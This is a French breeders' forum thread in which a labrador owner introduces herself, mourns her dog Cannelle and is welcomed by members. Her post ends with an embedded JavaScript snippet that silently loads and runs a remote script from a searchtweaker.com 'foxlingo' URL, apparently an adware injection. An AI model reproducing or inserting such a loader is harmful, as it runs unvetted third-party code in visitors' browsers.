Forum des Éleveurs Rebelles
Forum des Éleveurs Rebelles
Forum des Éleveurs Rebelles
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.

Forum des Éleveurs Rebelles

Eleveurs et propriétaires de chiens de races réfractaires aux idées reçues et ayant quelque chose à dire. Lecture libre, nous invitons volontiers nos détracteurs à s'instruire.
 
AccueilPortailGalerieDernières imagesS'enregistrerConnexion
Le Deal du moment :
Display Star Wars Unlimited Ombres de la Galaxie : ...
Voir le deal

 

 Bonsoir à tout le monde

Aller en bas 
5 participants
AuteurMessage
CANNELLE




Messages : 7
Date d'inscription : 25/09/2014

Bonsoir à tout le monde Empty
MessageSujet: Bonsoir à tout le monde   Bonsoir à tout le monde Icon_minitimeVen 26 Sep - 18:32

Je m'appelle JOELLE, J'habite le Pas de Calais, à GOUY SOUS BELLONNE, c'est près de DOUAI.
Mon mari et moi-même avons acheté la première fois un labrador sans connaître plus que cela cette race, et depuis nous n'avons plus changer de race. Nous avons eu blondie (sable), Nicky (noir). Malheureusement, notre CANNELLE (chocolat), vient de nous quitter, et nous sommes dans l'attente de JESSIE, labrador sable.

Voici une photo de CANNELLE, elle a été prise le 20 juillet dernierBonsoir à tout le monde YiXrIc

Merci de m'avoir accepté.
Bonne soirée




(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Revenir en haut Aller en bas
Alex68




Messages : 183
Date d'inscription : 02/01/2012
Age : 51
Localisation : Colmar

Bonsoir à tout le monde Empty
MessageSujet: Re: Bonsoir à tout le monde   Bonsoir à tout le monde Icon_minitimeSam 27 Sep - 3:17

Bienvenue Cannelle !

Very Happy
Revenir en haut Aller en bas
Haoden




Messages : 14
Date d'inscription : 09/09/2014

Bonsoir à tout le monde Empty
MessageSujet: Re: Bonsoir à tout le monde   Bonsoir à tout le monde Icon_minitimeSam 27 Sep - 9:48

Bienvenue Cannelle !
Revenir en haut Aller en bas
Valhalla
Admin
Valhalla


Messages : 2421
Date d'inscription : 21/07/2011
Age : 79
Localisation : Gy Les Nonains

Bonsoir à tout le monde Empty
MessageSujet: Re: Bonsoir à tout le monde   Bonsoir à tout le monde Icon_minitimeSam 27 Sep - 11:00

Bienvenue !Bonsoir à tout le monde Francageral
Revenir en haut Aller en bas
http://www.labradors.org
chantal_mayoland

chantal_mayoland


Messages : 224
Date d'inscription : 22/07/2011

Bonsoir à tout le monde Empty
MessageSujet: Re: Bonsoir à tout le monde   Bonsoir à tout le monde Icon_minitimeDim 28 Sep - 21:04

bienvenue
voisine
Revenir en haut Aller en bas
http://www.lejack.com
Contenu sponsorisé





Bonsoir à tout le monde Empty
MessageSujet: Re: Bonsoir à tout le monde   Bonsoir à tout le monde Icon_minitime

Revenir en haut Aller en bas
 
Bonsoir à tout le monde
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Bonjour tout le monde!
» coucou tout le monde
» Bonjour tout le monde,
» Bonjour tout le monde.
» On ne peut pas plaire à tout le monde

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Forum des Éleveurs Rebelles :: Présentations des intervenants-
Sauter vers: